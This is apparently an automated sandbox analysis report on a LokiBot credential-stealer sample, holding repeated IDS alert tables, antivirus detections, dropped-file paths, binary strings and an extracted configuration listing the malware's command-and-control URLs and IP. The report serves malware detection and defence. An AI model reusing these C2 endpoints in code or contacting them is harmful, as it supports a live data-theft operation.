2024-12-04T06:53:50.049274+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49916	94.156.177.41	80	TCP
2024-12-04T06:53:51.907714+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49920	94.156.177.41	80	TCP
2024-12-04T06:53:53.783128+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49925	94.156.177.41	80	TCP
2024-12-04T06:53:55.529845+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49930	94.156.177.41	80	TCP
2024-12-04T06:53:57.398751+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49936	94.156.177.41	80	TCP
2024-12-04T06:53:59.245469+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49941	94.156.177.41	80	TCP
2024-12-04T06:54:01.080502+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49946	94.156.177.41	80	TCP
2024-12-04T06:54:02.961210+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49950	94.156.177.41	80	TCP

ET MALWARE LokiBot Request for C2 Commands Detected M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-04T06:52:11.901579+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49739	94.156.177.41	80	TCP
2024-12-04T06:52:13.773578+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49740	94.156.177.41	80	TCP
2024-12-04T06:52:15.532769+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49741	94.156.177.41	80	TCP
2024-12-04T06:52:17.218226+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49743	94.156.177.41	80	TCP
2024-12-04T06:52:19.025824+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49746	94.156.177.41	80	TCP
2024-12-04T06:52:20.880675+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49750	94.156.177.41	80	TCP
2024-12-04T06:52:22.683187+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49752	94.156.177.41	80	TCP
2024-12-04T06:52:24.551833+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49754	94.156.177.41	80	TCP
2024-12-04T06:52:26.403488+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49756	94.156.177.41	80	TCP
2024-12-04T06:52:28.258701+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49757	94.156.177.41	80	TCP
2024-12-04T06:52:30.177926+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49759	94.156.177.41	80	TCP
2024-12-04T06:52:32.085852+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49761	94.156.177.41	80	TCP
2024-12-04T06:52:34.340931+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49762	94.156.177.41	80	TCP
2024-12-04T06:52:36.018358+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49764	94.156.177.41	80	TCP
2024-12-04T06:52:37.879906+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49766	94.156.177.41	80	TCP
2024-12-04T06:52:39.817896+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49767	94.156.177.41	80	TCP
2024-12-04T06:52:41.707155+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49768	94.156.177.41	80	TCP
2024-12-04T06:52:43.608002+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49769	94.156.177.41	80	TCP
2024-12-04T06:52:45.535212+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49770	94.156.177.41	80	TCP
2024-12-04T06:52:47.435569+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49771	94.156.177.41	80	TCP
2024-12-04T06:52:49.349051+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49772	94.156.177.41	80	TCP
2024-12-04T06:52:51.251091+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49773	94.156.177.41	80	TCP
2024-12-04T06:52:52.949423+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49774	94.156.177.41	80	TCP
2024-12-04T06:52:54.623292+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49775	94.156.177.41	80	TCP
2024-12-04T06:52:56.524407+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49776	94.156.177.41	80	TCP
2024-12-04T06:52:58.372095+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49778	94.156.177.41	80	TCP
2024-12-04T06:53:00.231152+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49780	94.156.177.41	80	TCP
2024-12-04T06:53:02.093707+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49786	94.156.177.41	80	TCP
2024-12-04T06:53:04.009007+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49792	94.156.177.41	80	TCP
2024-12-04T06:53:05.702695+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49793	94.156.177.41	80	TCP
2024-12-04T06:53:07.476673+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49799	94.156.177.41	80	TCP
2024-12-04T06:53:09.330217+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49805	94.156.177.41	80	TCP
2024-12-04T06:53:11.164303+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49811	94.156.177.41	80	TCP
2024-12-04T06:53:12.980893+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49816	94.156.177.41	80	TCP
2024-12-04T06:53:14.868129+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49818	94.156.177.41	80	TCP
2024-12-04T06:53:16.678278+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49824	94.156.177.41	80	TCP
2024-12-04T06:53:18.586498+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49829	94.156.177.41	80	TCP
2024-12-04T06:53:20.454492+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49834	94.156.177.41	80	TCP
2024-12-04T06:53:22.119370+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49841	94.156.177.41	80	TCP
2024-12-04T06:53:23.990954+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49845	94.156.177.41	80	TCP
2024-12-04T06:53:25.847762+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49850	94.156.177.41	80	TCP
2024-12-04T06:53:27.716217+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49855	94.156.177.41	80	TCP
2024-12-04T06:53:29.409695+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49861	94.156.177.41	80	TCP
2024-12-04T06:53:31.273515+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49866	94.156.177.41	80	TCP
2024-12-04T06:53:33.162635+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49871	94.156.177.41	80	TCP
2024-12-04T06:53:35.093148+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49875	94.156.177.41	80	TCP
2024-12-04T06:53:37.030637+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49881	94.156.177.41	80	TCP
2024-12-04T06:53:38.846753+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49886	94.156.177.41	80	TCP
2024-12-04T06:53:40.713775+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49891	94.156.177.41	80	TCP
2024-12-04T06:53:42.517335+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49896	94.156.177.41	80	TCP
2024-12-04T06:53:44.404340+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49902	94.156.177.41	80	TCP
2024-12-04T06:53:46.309965+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49906	94.156.177.41	80	TCP
2024-12-04T06:53:48.190933+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49912	94.156.177.41	80	TCP
2024-12-04T06:53:50.049274+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49916	94.156.177.41	80	TCP
2024-12-04T06:53:51.907714+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49920	94.156.177.41	80	TCP
2024-12-04T06:53:53.783128+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49925	94.156.177.41	80	TCP
2024-12-04T06:53:55.529845+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49930	94.156.177.41	80	TCP
2024-12-04T06:53:57.398751+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49936	94.156.177.41	80	TCP
2024-12-04T06:53:59.245469+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49941	94.156.177.41	80	TCP
2024-12-04T06:54:01.080502+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49946	94.156.177.41	80	TCP
2024-12-04T06:54:02.961210+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49950	94.156.177.41	80	TCP

ET MALWARE LokiBot User-Agent (Charon/Inferno)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-04T06:52:06.767642+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49737	94.156.177.41	80	TCP
2024-12-04T06:52:08.695716+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49738	94.156.177.41	80	TCP
2024-12-04T06:52:10.478754+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49739	94.156.177.41	80	TCP
2024-12-04T06:52:12.295749+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49740	94.156.177.41	80	TCP
2024-12-04T06:52:14.164338+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49741	94.156.177.41	80	TCP
2024-12-04T06:52:15.938259+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49743	94.156.177.41	80	TCP
2024-12-04T06:52:17.657827+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49746	94.156.177.41	80	TCP
2024-12-04T06:52:19.405358+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49750	94.156.177.41	80	TCP
2024-12-04T06:52:21.262165+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49752	94.156.177.41	80	TCP
2024-12-04T06:52:23.073188+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49754	94.156.177.41	80	TCP
2024-12-04T06:52:24.932098+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49756	94.156.177.41	80	TCP
2024-12-04T06:52:26.793786+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49757	94.156.177.41	80	TCP
2024-12-04T06:52:28.638241+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49759	94.156.177.41	80	TCP
2024-12-04T06:52:30.565483+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49761	94.156.177.41	80	TCP
2024-12-04T06:52:32.892280+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49762	94.156.177.41	80	TCP
2024-12-04T06:52:34.734954+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49764	94.156.177.41	80	TCP
2024-12-04T06:52:36.409350+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49766	94.156.177.41	80	TCP
2024-12-04T06:52:38.347814+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49767	94.156.177.41	80	TCP
2024-12-04T06:52:40.197879+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49768	94.156.177.41	80	TCP
2024-12-04T06:52:42.088177+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49769	94.156.177.41	80	TCP
2024-12-04T06:52:44.074154+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49770	94.156.177.41	80	TCP
2024-12-04T06:52:45.927567+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49771	94.156.177.41	80	TCP
2024-12-04T06:52:47.828393+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49772	94.156.177.41	80	TCP
2024-12-04T06:52:49.779959+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49773	94.156.177.41	80	TCP
2024-12-04T06:52:51.635755+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49774	94.156.177.41	80	TCP
2024-12-04T06:52:53.344478+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49775	94.156.177.41	80	TCP
2024-12-04T06:52:55.009703+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49776	94.156.177.41	80	TCP
2024-12-04T06:52:56.900865+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49778	94.156.177.41	80	TCP
2024-12-04T06:52:58.761872+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49780	94.156.177.41	80	TCP
2024-12-04T06:53:00.620039+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49786	94.156.177.41	80	TCP
2024-12-04T06:53:02.477302+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49792	94.156.177.41	80	TCP
2024-12-04T06:53:04.401220+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49793	94.156.177.41	80	TCP
2024-12-04T06:53:06.095984+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49799	94.156.177.41	80	TCP
2024-12-04T06:53:07.851506+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49805	94.156.177.41	80	TCP
2024-12-04T06:53:09.713035+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49811	94.156.177.41	80	TCP
2024-12-04T06:53:11.637327+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49816	94.156.177.41	80	TCP
2024-12-04T06:53:13.370849+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49818	94.156.177.41	80	TCP
2024-12-04T06:53:15.244855+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49824	94.156.177.41	80	TCP
2024-12-04T06:53:17.057306+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49829	94.156.177.41	80	TCP
2024-12-04T06:53:18.965518+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49834	94.156.177.41	80	TCP
2024-12-04T06:53:20.841367+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49841	94.156.177.41	80	TCP
2024-12-04T06:53:22.493732+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49845	94.156.177.41	80	TCP
2024-12-04T06:53:24.369185+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49850	94.156.177.41	80	TCP
2024-12-04T06:53:26.229898+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49855	94.156.177.41	80	TCP
2024-12-04T06:53:28.109936+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49861	94.156.177.41	80	TCP
2024-12-04T06:53:29.804559+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49866	94.156.177.41	80	TCP
2024-12-04T06:53:31.659622+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49871	94.156.177.41	80	TCP
2024-12-04T06:53:33.543135+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49875	94.156.177.41	80	TCP
2024-12-04T06:53:35.720159+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49881	94.156.177.41	80	TCP
2024-12-04T06:53:37.417338+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49886	94.156.177.41	80	TCP
2024-12-04T06:53:39.230433+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49891	94.156.177.41	80	TCP
2024-12-04T06:53:41.090316+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49896	94.156.177.41	80	TCP
2024-12-04T06:53:42.933722+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49902	94.156.177.41	80	TCP
2024-12-04T06:53:44.792352+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49906	94.156.177.41	80	TCP
2024-12-04T06:53:46.706490+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49912	94.156.177.41	80	TCP
2024-12-04T06:53:48.570673+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49916	94.156.177.41	80	TCP
2024-12-04T06:53:50.433426+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49920	94.156.177.41	80	TCP
2024-12-04T06:53:52.290981+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49925	94.156.177.41	80	TCP
2024-12-04T06:53:54.163772+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49930	94.156.177.41	80	TCP
2024-12-04T06:53:55.922617+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49936	94.156.177.41	80	TCP
2024-12-04T06:53:57.777455+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49941	94.156.177.41	80	TCP
2024-12-04T06:53:59.620459+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49946	94.156.177.41	80	TCP
2024-12-04T06:54:01.491745+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49950	94.156.177.41	80	TCP

ETPRO MALWARE LokiBot Checkin M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-04T06:52:06.767642+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49737	94.156.177.41	80	TCP
2024-12-04T06:52:08.695716+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49738	94.156.177.41	80	TCP
2024-12-04T06:52:10.478754+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49739	94.156.177.41	80	TCP
2024-12-04T06:52:12.295749+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49740	94.156.177.41	80	TCP
2024-12-04T06:52:14.164338+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49741	94.156.177.41	80	TCP
2024-12-04T06:52:15.938259+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49743	94.156.177.41	80	TCP
2024-12-04T06:52:17.657827+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49746	94.156.177.41	80	TCP
2024-12-04T06:52:19.405358+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49750	94.156.177.41	80	TCP
2024-12-04T06:52:21.262165+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49752	94.156.177.41	80	TCP
2024-12-04T06:52:23.073188+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49754	94.156.177.41	80	TCP
2024-12-04T06:52:24.932098+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49756	94.156.177.41	80	TCP
2024-12-04T06:52:26.793786+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49757	94.156.177.41	80	TCP
2024-12-04T06:52:28.638241+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49759	94.156.177.41	80	TCP
2024-12-04T06:52:30.565483+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49761	94.156.177.41	80	TCP
2024-12-04T06:52:32.892280+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49762	94.156.177.41	80	TCP
2024-12-04T06:52:34.734954+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49764	94.156.177.41	80	TCP
2024-12-04T06:52:36.409350+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49766	94.156.177.41	80	TCP
2024-12-04T06:52:38.347814+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49767	94.156.177.41	80	TCP
2024-12-04T06:52:40.197879+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49768	94.156.177.41	80	TCP
2024-12-04T06:52:42.088177+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49769	94.156.177.41	80	TCP
2024-12-04T06:52:44.074154+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49770	94.156.177.41	80	TCP
2024-12-04T06:52:45.927567+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49771	94.156.177.41	80	TCP
2024-12-04T06:52:47.828393+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49772	94.156.177.41	80	TCP
2024-12-04T06:52:49.779959+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49773	94.156.177.41	80	TCP
2024-12-04T06:52:51.635755+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49774	94.156.177.41	80	TCP
2024-12-04T06:52:53.344478+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49775	94.156.177.41	80	TCP
2024-12-04T06:52:55.009703+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49776	94.156.177.41	80	TCP
2024-12-04T06:52:56.900865+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49778	94.156.177.41	80	TCP
2024-12-04T06:52:58.761872+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49780	94.156.177.41	80	TCP
2024-12-04T06:53:00.620039+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49786	94.156.177.41	80	TCP
2024-12-04T06:53:02.477302+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49792	94.156.177.41	80	TCP
2024-12-04T06:53:04.401220+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49793	94.156.177.41	80	TCP
2024-12-04T06:53:06.095984+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49799	94.156.177.41	80	TCP
2024-12-04T06:53:07.851506+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49805	94.156.177.41	80	TCP
2024-12-04T06:53:09.713035+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49811	94.156.177.41	80	TCP
2024-12-04T06:53:11.637327+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49816	94.156.177.41	80	TCP
2024-12-04T06:53:13.370849+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49818	94.156.177.41	80	TCP
2024-12-04T06:53:15.244855+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49824	94.156.177.41	80	TCP
2024-12-04T06:53:17.057306+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49829	94.156.177.41	80	TCP
2024-12-04T06:53:18.965518+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49834	94.156.177.41	80	TCP
2024-12-04T06:53:20.841367+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49841	94.156.177.41	80	TCP
2024-12-04T06:53:22.493732+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49845	94.156.177.41	80	TCP
2024-12-04T06:53:24.369185+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49850	94.156.177.41	80	TCP
2024-12-04T06:53:26.229898+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49855	94.156.177.41	80	TCP
2024-12-04T06:53:28.109936+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49861	94.156.177.41	80	TCP
2024-12-04T06:53:29.804559+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49866	94.156.177.41	80	TCP
2024-12-04T06:53:31.659622+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49871	94.156.177.41	80	TCP
2024-12-04T06:53:33.543135+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49875	94.156.177.41	80	TCP
2024-12-04T06:53:35.720159+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49881	94.156.177.41	80	TCP
2024-12-04T06:53:37.417338+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49886	94.156.177.41	80	TCP
2024-12-04T06:53:39.230433+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49891	94.156.177.41	80	TCP
2024-12-04T06:53:41.090316+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49896	94.156.177.41	80	TCP
2024-12-04T06:53:42.933722+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49902	94.156.177.41	80	TCP
2024-12-04T06:53:44.792352+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49906	94.156.177.41	80	TCP
2024-12-04T06:53:46.706490+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49912	94.156.177.41	80	TCP
2024-12-04T06:53:48.570673+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49916	94.156.177.41	80	TCP
2024-12-04T06:53:50.433426+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49920	94.156.177.41	80	TCP
2024-12-04T06:53:52.290981+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49925	94.156.177.41	80	TCP
2024-12-04T06:53:54.163772+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49930	94.156.177.41	80	TCP
2024-12-04T06:53:55.922617+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49936	94.156.177.41	80	TCP
2024-12-04T06:53:57.777455+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49941	94.156.177.41	80	TCP
2024-12-04T06:53:59.620459+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49946	94.156.177.41	80	TCP
2024-12-04T06:54:01.491745+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49950	94.156.177.41	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: CLOSURE DATE FOR THE YEAR.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe

Avira: detection malicious, Label: HEUR/AGEN.1357257

Found malware configuration

Source: 00000000.00000002.1754216796.00000000028D6000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "94.156.177.41/kings/five/fre.php"]}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe

ReversingLabs: Detection: 39%

Multi AV Scanner detection for submitted file

Source: CLOSURE DATE FOR THE YEAR.exe	ReversingLabs: Detection: 39%
Source: CLOSURE DATE FOR THE YEAR.exe	Virustotal: Detection: 47%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: CLOSURE DATE FOR THE YEAR.exe

Joe Sandbox ML: detected

Source: CLOSURE DATE FOR THE YEAR.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: CLOSURE DATE FOR THE YEAR.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: IOsbBBIDAm.exe, 00000009.00000002.2071822509.0000000007CF8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.ni.pdb source: WERA61F.tmp.dmp.16.dr
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: IOsbBBIDAm.exe, 00000009.00000002.2071822509.0000000007CF8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.pdb%t& source: IOsbBBIDAm.exe, 00000009.00000002.2071822509.0000000007CF8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.pdbpdbtem.pdb source: IOsbBBIDAm.exe, 00000009.00000002.2071822509.0000000007CF8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Accessibility.pdb source: WERA61F.tmp.dmp.16.dr
Source:	Binary string: System.ni.pdbRSDS source: WERA61F.tmp.dmp.16.dr
Source:	Binary string: System.pdbN\|2h\|2 Z\|2_CorDllMainmscoree.dll source: IOsbBBIDAm.exe, 00000009.00000002.2056533071.00000000008A2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: HP*n0C:\Windows\mscorlib.pdb source: IOsbBBIDAm.exe, 00000009.00000002.2056433642.0000000000737000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: RegSvcs.pdb, source: RegSvcs.exe, 00000008.00000002.2902905606.0000000000E52000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: System.Configuration.ni.pdb source: WERA61F.tmp.dmp.16.dr
Source:	Binary string: mscorlib.ni.pdbRSDS source: WERA61F.tmp.dmp.16.dr
Source:	Binary string: RegSvcs.pdb source: RegSvcs.exe, RegSvcs.exe, 00000008.00000002.2902905606.0000000000E52000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: System.Configuration.pdb source: WERA61F.tmp.dmp.16.dr
Source:	Binary string: \??\C:\Windows\System.pdb source: IOsbBBIDAm.exe, 00000009.00000002.2071822509.0000000007CF8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdbAccessibility.dll source: WERA61F.tmp.dmp.16.dr
Source:	Binary string: System.Xml.pdb source: WERA61F.tmp.dmp.16.dr
Source:	Binary string: System.pdb source: IOsbBBIDAm.exe, 00000009.00000002.2056533071.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, WERA61F.tmp.dmp.16.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WERA61F.tmp.dmp.16.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WERA61F.tmp.dmp.16.dr
Source:	Binary string: System.Core.ni.pdb source: WERA61F.tmp.dmp.16.dr
Source:	Binary string: %%.pdb source: IOsbBBIDAm.exe, 00000009.00000002.2056433642.0000000000737000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.pdb source: WERA61F.tmp.dmp.16.dr
